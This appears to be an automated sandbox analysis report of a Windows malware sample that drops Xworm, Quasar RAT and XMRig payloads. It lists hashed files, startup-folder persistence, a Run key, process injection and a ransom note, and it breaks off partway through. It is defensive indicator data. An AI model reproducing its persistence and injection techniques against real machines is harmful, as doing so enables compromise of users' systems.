| SHA256 | 00ac4add3fbf73f31bdeb249969dddc68da554c9e9383ec524d63c64dc3f4b53 |
| SHA512 | 75bf55c4f619948f16e29f51008d026e7789eda82615f566b150d54f5769b64d7fe1a6ff8be458e2630be621c551183dfe272ce0a579024065cbc2b4b26f4bf5 |
memory/3096-1470-0x0000000000F40000-0x0000000000FAA000-memory.dmp
memory/1060-1487-0x0000000000D10000-0x0000000000D1C000-memory.dmp
C:\Users\Admin\NTUSER.DAT{53b39e88-18c4-11ea-a811-000d3aa4692b}.TMContainer00000000000000000001.regtrans-ms.ENC
| MD5 | f5c4fca52ede7a1173c28186128056d3 |
| SHA1 | c5184c28a972a646c8a3fe68f3c25e77ef2612af |
| SHA256 | 0bfe4ec1ae3f35ea64a3976443ad90f2825528df97c96a501f9a97af0fd74435 |
| SHA512 | 29694fe89b3037a0ca1ee95382791ee2f3c4a9dd0067f41cf1152234fd45c3282bd43ce4edcd8b8c015868a21df78cb9b2d52e145d1caa4a5e04d0524092da1b |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | a17e200fbd878dbf1c2ab1b41055a4a9 |
| SHA1 | 6230263ac84f203773d750583e6d161f1c196ea0 |
| SHA256 | 8506bb9534d6bd8a63eab4993f965128ed7f89d060b50da73219a1e753a50188 |
| SHA512 | 8545eafd94f53238b34aa11f90358c96139d1482194028a3cf42accc073714e1562f6b9619c9fff9958643c083defff75077aeed6c41d347d94fe3235375ce5e |
\??\pipe\crashpad_2016_GQJOXRGPYWMTSJZA
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports
| MD5 | d751713988987e9331980363e24189ce |
| SHA1 | 97d170e1550eee4afc0af065b78cda302a97674c |
| SHA256 | 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945 |
| SHA512 | b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af |
C:\Users\Admin\AppData\Local\Temp\ENC.img
| MD5 | 8c785c53009428b38afac4b7a6b93c10 |
| SHA1 | 2877606f84020beb917bd9b02483645bdcb07b42 |
| SHA256 | fa84153083d3de758fdc3ed86a9185f026755b9c89ba6f779ecd6df19ec1a94d |
| SHA512 | 23e20700b5d5f4c37c2701738f8ff5a010aaaca7ca4fce16703913dbe340239beb5ba403e92e7ef60b7e903b8d402e7ed29b7eee4048d7c4ec56de1ddb9db815 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 96520b2715b18824afc4ced48ea5533a |
| SHA1 | a029d7c1327d9b15c4bfffa361778e1f465f02db |
| SHA256 | 80280adb178086fd68f3d9c09140e5bcf9e680712bc58ee28d04e16c8c12731a |
| SHA512 | fcc93d51dcca3c06c8764d4f778da1a5851f5c7b9c126304f4d83c19163147b6698e0e33f72e398f42e595a2018a7df81860af84756490f7da4caced61000ded |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 36326fcbb6119326e7c8aa24c4156548 |
| SHA1 | ed128a9727e1d58b970e732b8c66fc827b18372b |
| SHA256 | ac41191dcaf36d91f7bd9a077bc59b1bd7218daa27b263d1da6a548f58264987 |
| SHA512 | ed5c79f1edc0c65a1cf0ace91ea5538245c1569c3b25ae3cdf033ffcb55d37e7b09baec36570e82fc1525c24224cea08a53abab7e52db6376f48f099ffefd1fe |
C:\Users\Admin\Desktop\How To Decrypt My Files.html
| MD5 | d945801bb65b57524011cf0474ba0f0f |
| SHA1 | eb4708741bb6dbce89239ddc1dad3a43dfb4403d |
| SHA256 | ff1afd836f4bc07130484d89690d8251dd10218cc15b5a15fa04228376f55268 |
| SHA512 | cc2d9b4f5467ea53f05f65d76047c7f9e9f6bef8dd618ae9f834cadefaece4ea71e7d3814c32be7fe3c4bad0b27d6aafb27b1b5a4dfcfb53e928356dd92abc21 |
memory/3880-1801-0x000001A480000000-0x000001A480528000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\5a2a7058cf8d1e56c20e6b19a7c48eb2386d141b.tbres
| MD5 | ad194e8c7806b1994b56acba749ddf70 |
| SHA1 | 20ae0f73b983f0b748a6504f9fb1e1c7f8a6e802 |
| SHA256 | c0003276e0d4e9c32e76e44b101d019043e0b93af37ee8a81efd2aa6c8d35fe1 |
| SHA512 | f963b04d62119fae18c48951c350f1b49241292e711e6275e565f2de1cb017f6bc1c7e7759807a3f9fdacc9d0edf747a5665bf8395aecdbd19be98f85be88abb |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\Logs\sync_diagnostic.log
| MD5 | 28ce813fea1e3b30cbbd0709cad09443 |
| SHA1 | 580e515ebb3d91dbfbc4e8b2a95e1ea7a4fe1646 |
| SHA256 | 77bc93285ab8c9c5aca6069322aabcb2c6af22ec7905a1ee06606dd549abdc6c |
| SHA512 | bcf45637c491f4b44ce24dd3de149cbed84f4c0a67ef87e9362d7741e1007f291f657fcded087392dd9641fca600a10c4d203b3a181a63dbb44dae25e8ab63a0 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\DualEngine\SiteList-Enterprise.json
| MD5 | 99914b932bd37a50b983c5e7c90ae93b |
| SHA1 | bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f |
| SHA256 | 44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a |
| SHA512 | 27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\HubApps
| MD5 | 06d55006c2dec078a94558b85ae01aef |
| SHA1 | 6a9b33e794b38153f67d433b30ac2a7cf66761e6 |
| SHA256 | 088bb586f79dd99c5311d14e1560bbe0bb56225a1b4432727d2183341c762bcd |
| SHA512 | ec190652af9c213ccbb823e69c21d769c64e3b9bae27bea97503c352163bf70f93c67cebbf327bfc73bfd632c9a3ae57283b6e4019af04750fe18a2410a68e60 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 1433a720a65253183624aad3dec9a45b |
| SHA1 | 1e33997bc96fbf453f194ab03609eab8eab2af8d |
| SHA256 | 4699b1d334c030584f1722a7b101f9046c1b0b2f51cc577519e1c828fb11c462 |
| SHA512 | 0608bf313b349ea43d8951d188709e6b832f709a9776e54edf9b2cb4ea4fc0d7e6fcaac925325d2296c3ed8e87b196c95053fc12e19b8eba3883423d700c9b03 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState
| MD5 | f39ad1b5334e3c05ea773dd1a5a379f8 |
| SHA1 | 5e97ca1a9b40bc933696893780f72bb2954ad17f |
| SHA256 | bcf7c1a033d62ebe1502524b8ec9248f955b17e6a9fe79e5717758c5f918b2c3 |
| SHA512 | 2555e680e55bd62e4574f3cd3f846e9cee3e08dd6cd5265dc80627f4fb24f939766f9bf5d80046cc2c8f08dbb99511b529788fe6fc373ac9b519fb3629e0c913 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | d24e447c83e1abe8a220d59708e9af4c |
| SHA1 | d82d24b49bd1fd8d9bfcfc21ef92d87dfc296e0b |
| SHA256 | 353fa9cd42fc4b3fd1f5110d9caca240288a9c21d5c53ab3902c1c9f97c5f081 |
| SHA512 | af4becd3c01dd0dcfd9aedaf817028efa6e5504408ceb0b1d9baaa79720532946643b9c0c764ef61b833a3c1f70c9237f16c3bf6f39dd9ab2c33c0867c50ffa8 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | b85910f60e03ac318ae6d385fa7567c3 |
| SHA1 | 36482aa7ecc8af72b9b06ad387232e2c0d6ef662 |
| SHA256 | d42917eecc4d4d49823b993666eb40d6849678fdf724a71238c16d744cb26206 |
| SHA512 | 89435e4472bc6590a1bc3a983a49590110a047c23e592604bd5e40c1e37bc0122025d8b904b01f54fa665a3cdb6edc080f45374569d49c28a0c884beb1cd99bd |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
| MD5 | 0076526279bad6f48b87df29d93c8198 |
| SHA1 | 09784f630e60882893b77a6ec5df0e574abdb290 |
| SHA256 | d036875940f444d2cf0603ac81726abbfefdc2d5a6bf0852d6e0dfe83067f1f0 |
| SHA512 | 48cbf72c347aaf1ea23707f45658ca9386e5dfb1fed6c8c3fe56a53ae572e7747bdddbd0af034192bb512726889d21ebeada7d6ba24aa0295500057d99f96985 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | dd2e0b582993de8fd19504fd7cf625cf |
| SHA1 | 1438136cb58ca0f46447e76ca0c5b464242ea097 |
| SHA256 | 2053b94262df44b382deee9b97c86c8e829c912415bc252a1ae628d1b32daeff |
| SHA512 | 72cfe01038c2e5c3c48087a74273c14f5cfac82b25f1fee40ecddb17779fe391b95fc5fe6f1a809f6b86be20961fdccd4e21544df793c5d3b827827380fec89d |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences
| MD5 | b2960e082ce87150e53f5d2ad4be8833 |
| SHA1 | f36f8a021247599690ce652a948b86c45b80fc16 |
| SHA256 | bdb1f5dedbd164e3d2b9881c46923abb602d429fca22e53d9370ac9c53462930 |
| SHA512 | 5d5ebb02e784de88b07750e3129fa2683276c2177fc512adfb704c4b2f75a24daa04af7e6a02558e30066cd6c623c3ab7212d9038587acb06b573197a796ebd4 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\DawnGraphiteCache\data_1
| MD5 | f50f89a0a91564d0b8a211f8921aa7de |
| SHA1 | 112403a17dd69d5b9018b8cede023cb3b54eab7d |
| SHA256 | b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec |
| SHA512 | bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | cbf32db5aef5a6e9c65041d2dab622d9 |
| SHA1 | 90f35f5341522b1dac5e3e38ea1e256afdc6378f |
| SHA256 | 175328b47f399e244cccd9919b9040a87927059cca9901947262cbfb60a83c57 |
| SHA512 | 2603849f411bc946af8dc0fcf1201b0829d3a25ade5be8e865002fd9a07be2cc7f236669ba39c478056fdd9cbbd5d043d2650f2d21ecf1b92ac1270a75e41183 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 67d0b77a2005e6529c30a42d27d809c7 |
| SHA1 | 0aed333411d87e7e3226cef0bbe222a57edb1661 |
| SHA256 | 0d78f432287723a7b9da232b63745905d12e2aa6c5505bba3660e2ac8a3ad509 |
| SHA512 | 9c24a17888c2df18ac66268a59a4fbfc73d74c241f6a02a1b3bfaa171228635929d60f0a575289e78670bf5f785f67f326ae3add528adb0e3f61848c5b16bbe5 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State
| MD5 | 458f1861e184d55ef4d96b05eed2fb66 |
| SHA1 | 70db872ea8232600581ce8ddd26a93955de83b43 |
| SHA256 | 7649fe588036ca9b083f094272b0a7b686e0edc25dd2fc2da14493608ad3abf3 |
| SHA512 | ea77c2a1783abfebb2edcdd0bd55566a88f8d05d69626c60dc883c2edf61985572744e300f462afeaece87993ace853651685615ab7dca56030f67c37c661980 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 1a98274bfa86069be7b0dbb8dcf167a0 |
| SHA1 | 015c7e8839830f394ecfa783b3c6aa3f182616f8 |
| SHA256 | 2ae2e64444ccf61d904020c5a4b516ba8f02bc4fd113ca999481977eb544531d |
| SHA512 | 748bd0b92078cf6b80b7c2dfce8c6fb2117f2e9286eb63335fdad35d903dc6e8fe8221ca32608aea6147f7668185e8b9d8136af8c2cbc3369e4e551edb4c3650 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Variations
| MD5 | 961e3604f228b0d10541ebf921500c86 |
| SHA1 | 6e00570d9f78d9cfebe67d4da5efe546543949a7 |
| SHA256 | f7b24f2eb3d5eb0550527490395d2f61c3d2fe74bb9cb345197dad81b58b5fed |
| SHA512 | 535f930afd2ef50282715c7e48859cc2d7b354ff4e6c156b94d5a2815f589b33189ffedfcaf4456525283e993087f9f560d84cfcf497d189ab8101510a09c472 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries
| MD5 | 20d4b8fa017a12a108c87f540836e250 |
| SHA1 | 1ac617fac131262b6d3ce1f52f5907e31d5f6f00 |
| SHA256 | 6028bd681dbf11a0a58dde8a0cd884115c04caa59d080ba51bde1b086ce0079d |
| SHA512 | 507b2b8a8a168ff8f2bdafa5d9d341c44501a5f17d9f63f3d43bd586bc9e8ae33221887869fa86f845b7d067cb7d2a7009efd71dda36e03a40a74fee04b86856 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Visited Links
| MD5 | d1f9a1a945298dc40fa5c98ba379c77d |
| SHA1 | 96b527884a744c8d37a9d5f1d26e83bd3cf38da2 |
| SHA256 | f06c9c32e7e5efff0e137b68bebcb3c3cee87578f20f6e5692c0c0c472f241bc |
| SHA512 | f91bc378ef7ee5d7b1fe0526e6bc6bb307d05e57df17fc62de277cf2d05da8f4821f2154334185024bc371162355c708b719d21bca54aa86a08185a7bc27d1d0 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\0c0a3ea6-a3b9-4976-9d7c-f7c8974e1d2c.tmp
| MD5 | 5058f1af8388633f609cadb75a75dc9d |
| SHA1 | 3a52ce780950d4d969792a2559cd519d7ee8c727 |
| SHA256 | cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8 |
| SHA512 | 0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\LOG
| MD5 | c626ad11649c79e3fd021247d60eb1af |
| SHA1 | 12a27ce93a15941c82712138c49c09b70fb0d7a4 |
| SHA256 | 0b486accc79f7bf758bebfac8c94df1b45fc0abd218b7df8a4ff950d6a8633f9 |
| SHA512 | 690ac7b44bd55210848352d9adbce3c7cf9faa7fd75fe7e701722e5ce598ab026b88e809cd296222ff0a3ccece2f8a8a6a654e71fc9c509db28e3ae5fdcc1a37 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\data_0
| MD5 | e30c8acefa2c4297eb1ec8f7d5154e18 |
| SHA1 | 9dd81a5adfd2c00bf2a346ab341131db13745957 |
| SHA256 | d850bb6bd280a6ca96adee87974d99cee6af09c11af17a51d9486d3a732fbb3d |
| SHA512 | 1e31c247dfa9acc261131ae46a96153b7fd83f141f555c4252239187be9108613b59be77d436349e42bf9e181acf37db6d22957c56e792e6d10cd1aaa67e4e51 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\data_3
| MD5 | 61c83dfd5f24c2d83f36b4d57a2b0b78 |
| SHA1 | 92a17768440a7f0882550b7425ad4c1821c46328 |
| SHA256 | 30686e7d2547790ac5bf8d87c0b4a0eb6f3282ea15097ee5565a326e7794b57a |
| SHA512 | 38ce4f1754422109afa5b9e33e1eb00dac82c7d657062959107468e74153fd19d53ee4c232cdd2ee8a1ab5320d1cb9f0f2c01a25fb1cdc1616413307c1c14728 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\data_1
| MD5 | 2655aa40d903b6e2c13f1a9715a68b15 |
| SHA1 | 85acf76f1117730ac9c0c8ef120ee5168330dd7a |
| SHA256 | 4c596282fab16f2720c1dfc35c79236d7e9f7741742a96744d4666cf2ac7355f |
| SHA512 | 2934f9bdceefa02462ddd98d64e6fdc8f677725760dc8ef209bed56548c5f017688d2436d1033844e61cb0f651a68f4d5040bd3c9395ae178179a34d3e04fa04 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\History
| MD5 | f03fa59413375068ade61faf7a993ce1 |
| SHA1 | 71b7a64a6c357e8585c2ab4142499e51c346fb77 |
| SHA256 | dc07756791fb5e3f19d37bff28c8f542d5415cecfdc72192c07b31d4cb7f48ca |
| SHA512 | cc1cf3c68e3d61b66f539e50b1bbe07b93734f9ab86d2fbd8f3f3c18cb1b8ed7f7b110fa179ed153ff51a40c389dd27f316674b6c222af8c612eb9362a573a4b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG
| MD5 | a6ed6b45dad3d9c439fff83c2695be38 |
| SHA1 | 4418a8bf205652dfd0a04272c1b9ef6b65e41938 |
| SHA256 | 78b6849ce51328c8f69f6b6cbd532c861cd53eba60df68972c65122bda98e2ea |
| SHA512 | 41bd3ed160c11a412973bc7d4cf8906c03c7c38a06cb75e68f8ca1ba7a9de8d2429d75852117539a10cb94b905944d5ae302e760859bcaca16597555c38288c9 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\ShaderCache\data_1
| MD5 | 62f13551681b6458bbc711c8b52cb7ab |
| SHA1 | 1de05426e07f486a436465f43180f3126f325dde |
| SHA256 | 215ec52c8e80c69fb6c2f7323153bfb04c8bfe090c248f84defa05de66313706 |
| SHA512 | 92509a1540c4051f652164bf308a9712462589ec7122ed934b2438aead86020652dc5cc474d24389b79883b7d37fab5f0345565d022452f659c9fb202dba47f8 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG
| MD5 | b5781c95d34c86654d040027ea2d6853 |
| SHA1 | 2ab83bada6335a2aa40e7b828fae69aebd2cc85f |
| SHA256 | 7099407217378f6593f672ee6231853742e864647aed01f49cc13ef08d93899b |
| SHA512 | f32502abbeeff587eb633cdfe9a6d0f577fdfc33a412493338b65683aea220eb474460b2a7e0f34eefc0b1117f960b216bdeb06efd80c866648c5a4f0728a5ec |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Last Version
| MD5 | 3e45022839c8def44fd96e24f29a9f4b |
| SHA1 | c798352b5a0860f8edfd5c1589cf6e5842c5c226 |
| SHA256 | 01a3e5d854762d8fdd01b235ce536fde31bf9a6be0596c295e3cea9aaf40f3dd |
| SHA512 | 2888982860091421f89f3d7444cacccb1938ef70fc084d3028d8a29021e6e1d83eaef62108eace2f0d590ed41ece0e443d8b564e9c9a860fc48d766edb1dc3d9 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 59d3e3ccb8d73684023b287c1dc4650a |
| SHA1 | f989d6d53547697667335762bd843a6b26ea04f5 |
| SHA256 | da635f10f1c92925f0579ebbfaccfe6512a81255722740213808bc39ebf5c6c7 |
| SHA512 | 038d405074d54756d8b0daafdfb6d0b9382bbfc40b2a2e630b92fcf797fca05e987d1c3ae0e0240f21d55216f51d3c0bdd88a7bc6ebea11b72ac1fca36309e28 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index
| MD5 | 02fa9cfba0efa98d9cecef5c87ce62d5 |
| SHA1 | 697d65a9e5f14e4fdd2258d9dda600085ba95edb |
| SHA256 | c95e3888ecc710ae7446109296f1aabfd46beee7f8a564ca93024b410af77c85 |
| SHA512 | 9c98f4bfb3d98fa49659ee59e83b0d7465631f902769a412db3586e7a0148dd24eacc83c4428e48ff4726909e72cbf12cc31ff277b0df58fbb951b32244cd0f4 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe594472.TMP
| MD5 | 1a0a456f856873a5a9309edce3fab473 |
| SHA1 | b92d8b78a34ab62e40fff4005b49474881fbe3b6 |
| SHA256 | 03c3497adcbeabdccf628f44b1177f89f94879a5a773ffaf0bedfba6e29ee60e |
| SHA512 | c8d344bd9f7297f88ce61dd28e5c5a2b9ac0f3d4ba074d7a576ea711914de9027677d58c547fdac58ee45216945b44e6d91293b42256ff819f035749b042fc46 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | 8f8d03cca457b9c2f8d0167411ddbe73 |
| SHA1 | c141c820fedc664b81655efe9a045b9d229a016e |
| SHA256 | 03f76d380b89410221fc5ffa00d2f335bdaf09359fee8495349e36924dfac214 |
| SHA512 | 9cc003af1410d6c3ba6af018aef8d7df2058b7686be0343fd2fa179fcb4b75ee23541f041d36213f3ec2c18c71826cd91d94433278f724f8093b65b4e0715e76 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 70a873ad9a8fd76dd48ed67b696206e2 |
| SHA1 | c424ff332aef2d8c490db3416b2895378b565251 |
| SHA256 | b2a76595f7bbcf3c8cf3705fc9cf5edb5adb318cec0f46bcaf3686aa8cc56b4d |
| SHA512 | 5b2d5761d8711613098d8bd9755a38a5885ea26d79a05f13bd3bd9272ee36abecdc23d207a6085f87601851b56dd9a48668618b9f4827d9c99f0312299988bc5 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
| MD5 | 3cd06142a6586b107f2d183974b05df4 |
| SHA1 | 2314946576fa7a69502637715e661f1018556f19 |
| SHA256 | 279933b64d87df5d6ca9b098431c606594e52d025a0bcffc5430055ca1d41b84 |
| SHA512 | 0c959f0436220350e294d86724c885da0a7ae08249acad29db5846c605b65ab379eaf51f5e52728518a71e6436dbad8dd8103e85a3d059322eeb0ed3567a6556 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 41a7f079e85c2a4f54e1052247b077a3 |
| SHA1 | 9afc19e2362b26cdaa9bf0edf833fa921f94aedb |
| SHA256 | 96bac7a7fe2f09187e96e566d0cc74c18d52c5581091b10bd4e12979e4b682d7 |
| SHA512 | 7ac203a83e3f0fd6eb3a39a753f715e9f22247dd3cc55dfa01107926d4a780a4d92eb40a396dd55593c68010661d31a8f63447fa5c5d63a48c5c79c4de9576b5 |
memory/5876-2431-0x0000000000220000-0x000000000028A000-memory.dmp
memory/1060-2505-0x0000000000DC0000-0x0000000000DCA000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1280_720_POS4.jpg
| MD5 | f1c3f0c151b4b375a7b6f0a934b9e0d2 |
| SHA1 | e1550ea133d153e7e13ddeb6a7ed19fd1c2ce22c |
| SHA256 | 7c7f38ad559e020bf8843ab9c5413acc3ab42786054a7c56d0c1b6e84ce5d75c |
| SHA512 | 8bc1791dcbd7aa19ace144fe7d7b997d2f41e98c4c7cac1206254b393e591ffef6d7ccc19de055c96558641e22fc9aeb2954f269da83068473309c0388b7d77d |
memory/3880-2681-0x00007FF973520000-0x00007FF973FE1000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2025-05-03 16:15
Reported
2025-05-03 16:18
Platform
win11-20250502-en
Max time kernel
150s
Max time network
151s
Command Line
Signatures
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Quasar RAT
Quasar family
Quasar payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 5316 created 632 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\system32\winlogon.exe |
| PID 908 created 632 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\system32\winlogon.exe |
Xmrig family
Xworm
Xworm family
xmrig
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Creates new service(s)
Stops running service(s)
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CompPkg.exe | C:\Windows\CompPkg.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CompPkg.exe | C:\Windows\CompPkg.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\systemprocess.exe | N/A |
| N/A | N/A | C:\Windows\host.exe | N/A |
| N/A | N/A | C:\Windows\CompPkg.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\CompPkg.exe | N/A |
| N/A | N/A | C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\CompPkg.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\CompPkg.exe | N/A |
Reads user/profile data of web browsers
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-434880884-4028056734-3558218839-1000\Software\Microsoft\Windows\CurrentVersion\Run\CompPkg = "C:\\Users\\Admin\\AppData\\Roaming\\CompPkg.exe" | C:\Windows\CompPkg.exe | N/A |
Obfuscated Files or Information: Command Obfuscation
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3016 set thread context of 848 | N/A | C:\Windows\host.exe | C:\Windows\system32\dialer.exe |
| PID 1480 set thread context of 5008 | N/A | C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe | C:\Windows\system32\dialer.exe |
| PID 1480 set thread context of 5268 | N/A | C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe | C:\Windows\system32\dialer.exe |
| PID 1480 set thread context of 2336 | N/A | C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe | C:\Windows\system32\dialer.exe |
| PID 5316 set thread context of 4636 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\System32\dllhost.exe |
| PID 908 set thread context of 4396 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\System32\dllhost.exe |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\CompPkg.exe | C:\Users\Admin\AppData\Local\Temp\primate protocol.exe | N/A |
| File created | C:\Windows\systemprocess.exe | C:\Users\Admin\AppData\Local\Temp\primate protocol.exe | N/A |
| File created | C:\Windows\host.exe | C:\Users\Admin\AppData\Local\Temp\primate protocol.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
